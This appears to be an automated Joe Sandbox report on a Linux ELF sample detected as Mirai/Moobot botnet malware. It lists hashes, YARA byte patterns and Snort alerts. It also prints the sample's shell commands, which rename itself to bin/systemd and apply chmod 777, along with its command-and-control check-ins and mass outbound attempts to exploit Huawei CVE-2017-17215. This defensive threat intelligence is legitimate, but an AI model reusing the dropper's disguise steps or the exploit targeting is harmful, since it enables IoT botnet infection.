Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
OMnylKuNNF.elf

Overview

General Information

Sample Name:OMnylKuNNF.elf
Original Sample Name:8406babfb9b432ee244575aa2e3f63fe.elf
Analysis ID:831159
MD5:8406babfb9b432ee244575aa2e3f63fe
SHA1:22761d5d5c43e0251bab907054066239a8f35b61
SHA256:9a067e32dd6c25053c302de7caf61cdc0f3982289eb91d06c449fe08a47fc6d3
Tags:64elfmirai
Infos:

Detection

Mirai, Moobot
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:831159
Start date and time:2023-03-21 07:09:07 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 24s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:OMnylKuNNF.elf
Original Sample Name:8406babfb9b432ee244575aa2e3f63fe.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@1/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Runtime Messages

Command:/tmp/OMnylKuNNF.elf
PID:6227
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: cannot create 2bin/systemd: Directory nonexistent
chmod: cannot access 'bin/systemd': No such file or directory

Process Tree

  • system is lnxubuntu20
  • OMnylKuNNF.elf (PID: 6227, Parent: 6126, MD5: 8406babfb9b432ee244575aa2e3f63fe) Arguments: /tmp/OMnylKuNNF.elf
    • sh (PID: 6228, Parent: 6227, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/systemd && mkdir bin; >2\\xffbin/systemd && mv /tmp/OMnylKuNNF.elf bin/systemd; chmod 777 bin/systemd"
      • sh New Fork (PID: 6229, Parent: 6228)
      • rm (PID: 6229, Parent: 6228, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/systemd
      • sh New Fork (PID: 6230, Parent: 6228)
      • mkdir (PID: 6230, Parent: 6228, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6231, Parent: 6228)
      • chmod (PID: 6231, Parent: 6228, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/systemd
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
OMnylKuNNF.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    OMnylKuNNF.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      OMnylKuNNF.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xce48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xceac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xced4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcefc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcfb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcfc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcfd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      OMnylKuNNF.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      OMnylKuNNF.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      Click to see the 11 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6227.1.0000000000400000.000000000040f000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6227.1.0000000000400000.000000000040f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6227.1.0000000000400000.000000000040f000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xce48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xceac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xced4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcefc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcfb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcfc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcfd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6227.1.0000000000400000.000000000040f000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6227.1.0000000000400000.000000000040f000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          Click to see the 12 entries

          Snort Signatures

          Timestamp:192.168.2.23197.39.195.6355812372152835222 03/21/23-07:11:34.483333
          SID:2835222
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.234.59.5340346372152835222 03/21/23-07:10:23.199102
          SID:2835222
          Source Port:40346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23147.46.122.9236620372152835222 03/21/23-07:11:56.415741
          SID:2835222
          Source Port:36620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.233.131.21952978372152835222 03/21/23-07:10:55.747017
          SID:2835222
          Source Port:52978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.238.8.8.854536532023883 03/21/23-07:09:52.583756
          SID:2023883
          Source Port:54536
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:156.224.24.249192.168.2.2356999477962030489 03/21/23-07:11:48.637846
          SID:2030489
          Source Port:56999
          Destination Port:47796
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.36.213.18839138372152835222 03/21/23-07:10:30.344361
          SID:2835222
          Source Port:39138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.39.34.18859102372152835222 03/21/23-07:10:07.047772
          SID:2835222
          Source Port:59102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2386.69.66.25358844372152835222 03/21/23-07:10:54.644031
          SID:2835222
          Source Port:58844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23157.157.112.17554656372152835222 03/21/23-07:09:59.757322
          SID:2835222
          Source Port:54656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23172.65.204.14443698372152835222 03/21/23-07:11:38.525358
          SID:2835222
          Source Port:43698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.39.190.24448276372152835222 03/21/23-07:11:01.870921
          SID:2835222
          Source Port:48276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.62.43.16047544372152835222 03/21/23-07:11:51.897568
          SID:2835222
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.39.167.7139372372152835222 03/21/23-07:10:39.495843
          SID:2835222
          Source Port:39372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.148.89.12049098372152835222 03/21/23-07:11:41.620198
          SID:2835222
          Source Port:49098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23156.224.24.24947796569992030490 03/21/23-07:09:52.816652
          SID:2030490
          Source Port:47796
          Destination Port:56999
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23213.176.10.17653290372152835222 03/21/23-07:11:34.410258
          SID:2835222
          Source Port:53290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: OMnylKuNNF.elfReversingLabs: Detection: 56%
          Source: OMnylKuNNF.elfVirustotal: Detection: 58%Perma Link
          Machine Learning detection for sample
          Source: OMnylKuNNF.elfJoe Sandbox ML: detected

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.23:54536 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:47796 -> 156.224.24.249:56999
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 156.224.24.249:56999 -> 192.168.2.23:47796
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54656 -> 157.157.112.175:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59102 -> 197.39.34.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40346 -> 197.234.59.53:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39138 -> 41.36.213.188:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39372 -> 197.39.167.71:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58844 -> 86.69.66.253:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52978 -> 41.233.131.219:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48276 -> 197.39.190.244:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53290 -> 213.176.10.176:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55812 -> 197.39.195.63:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43698 -> 172.65.204.144:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49098 -> 197.148.89.120:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47544 -> 41.62.43.160:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36620 -> 147.46.122.92:37215
          Connects to many ports of the same IP (likely port scanning)
          Source: global trafficTCP traffic: 197.129.229.190 ports 1,2,3,5,7,37215
          Source: global trafficTCP traffic: 197.128.125.185 ports 1,2,3,5,7,37215
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 54656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59102 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59102
          Source: unknownNetwork traffic detected: HTTP traffic on port 40346 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39138
          Source: unknownNetwork traffic detected: HTTP traffic on port 39372 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39372
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52978 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52978
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48276 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 48276
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53290 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55812 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53290
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55812
          Source: unknownNetwork traffic detected: HTTP traffic on port 43698 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49098 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47544 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 47544
          Source: unknownNetwork traffic detected: HTTP traffic on port 36620 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 144.90.217.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.112.230.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.142.207.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 67.109.118.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 103.160.243.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.222.71.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 39.64.117.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.166.195.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.34.26.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.207.137.67:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.173.85.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 70.231.0.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.27.218.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.32.137.247:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.215.173.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.108.11.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.69.16.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 5.15.36.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.241.208.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.57.255.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 173.172.132.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.182.44.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.177.93.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.147.30.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.5.39.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.65.123.117:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.119.158.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.170.42.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 103.48.114.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.200.253.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.170.121.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.18.158.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.106.252.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.58.97.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.146.31.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.211.68.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 48.110.217.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 178.214.93.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.67.60.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.0.255.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 167.194.236.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.189.169.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.113.133.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.102.87.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.174.146.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.193.18.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.36.114.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.30.69.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.165.196.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.3.145.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.136.75.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.31.196.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.207.95.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.9.10.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 83.68.182.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.188.3.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 208.20.45.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.6.190.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.178.124.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.50.183.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 201.143.54.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.129.28.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.54.6.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.215.80.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.185.75.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.8.111.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.76.115.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.245.170.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.203.69.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.96.66.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 212.205.232.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.98.130.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.61.196.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.77.68.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.159.20.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.147.213.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.71.230.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.204.38.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.230.62.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.3.124.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.150.155.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 182.47.193.78:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.165.182.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.121.183.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.202.117.10:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.218.242.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.155.136.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.156.86.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.186.133.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.186.145.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 51.18.127.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 150.63.70.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.107.254.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.116.183.8:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.26.89.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 31.250.169.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.58.208.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 153.32.27.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.199.215.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 84.48.48.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.44.42.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.179.123.75:37215
